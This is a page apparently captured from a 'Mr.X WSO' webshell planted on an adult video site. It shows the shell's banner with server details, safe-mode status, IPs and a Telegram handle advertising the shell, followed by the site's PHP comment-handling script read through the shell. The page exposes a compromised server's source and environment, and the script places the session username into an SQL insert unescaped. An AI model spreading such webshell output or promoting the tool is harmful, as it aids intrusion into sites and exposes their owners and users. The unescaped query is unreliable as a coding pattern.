| Attention: Uname: Php: Hdd: Cwd: | Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet 5.3.29 Safe mode: OFF Datetime: 2026-04-10 00:14:27 1999.30 GB Free: 65.65 GB (3%) /home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text | Server IP: 127.0.0.54 Client IP: 216.73.216.53 |
| [ Files ] | [ Logout ] |
|---|
<?php
session_start();
include '../admin/db.php';
if(!$_POST['id']) { header("Location: ".$basehttp."/"); exit(); }
if(!$_POST['comment']) {$res['error'] = 'true'; $res['info'] = "<div class='notification error'><p>Please write comment.</p></div>"; echo json_encode($res); exit(); }
if(!is_numeric($_POST['type'])) { exit(); }
if(strtolower($_POST['captcha']) != strtolower($_SESSION['captcha'])){
$res['error'] = 'true';
$res['info'] = "<div class='notification error'><p>Incorrect Captcha!</p></div>";
echo json_encode($res);
exit();
}
$id = mysqli_real_escape_string($dblink, $_POST['id']);
$comment = mysqli_real_escape_string($dblink, strip_tags($_POST['comment']));
if($comment_notregistered){
$userid = 0;
}else{
$userid = $_SESSION['userid'];
}
$type = mysqli_real_escape_string($dblink, $_POST['type']);
$now = time() - 60;
$throttle = dbQuery("SELECT record_num FROM comments WHERE userid = '$userid' AND content = '$id' AND type = '$type' AND timestamp > '$now'",false);
if(count($throttle) > 0) {
$res['error'] = 'true';
$res['info'] = "<div class='notification alert'><p>You may only post a comment once every 60 seconds.</p></div>";
echo json_encode($res);
exit();
}
switch ($type):
case 0:
$sql="SELECT record_num FROM content WHERE record_num = '$id'";
break;
case 1:
$sql="SELECT record_num FROM pornstars WHERE record_num = '$id'";
break;
case 2:
$sql="SELECT record_num FROM users WHERE record_num = '$id'";
break;
default:
$sql="";
endswitch;
$result = dbQuery($sql);
if(count($result) > 0) {
dbQuery("INSERT INTO comments (userid,name,comment, content, type,timestamp,ip) VALUES ('$userid','$_SESSION[username]','$comment','$id','$type','".time()."','".$_SERVER['REMOTE_ADDR']."')");
$res['error'] = 'false';
$res['info'] = "<div class='notification success'><p>Thank you! Your comment has been posted.</p></div>";
if($type == 2) {
sendEmail('new-post',$id);
} elseif($type == 0) {
$row = dbRow("SELECT title, submitter, photos FROM content WHERE record_num = $id");
if($row['photos'] == 1) {
$link = generateUrl('galleries', $row['title'],$id);
} else {
$link = generateUrl('video', $row['title'],$id);
}
sendEmail('new-comment',$row['submitter'], array('%link' => $link));
}
echo json_encode($res);
} else {
$res['error'] = 'true';
$res['info'] = "<div class='notification error'><p>This content doesn't exist.</p></div>";
echo json_encode($res);
}
?>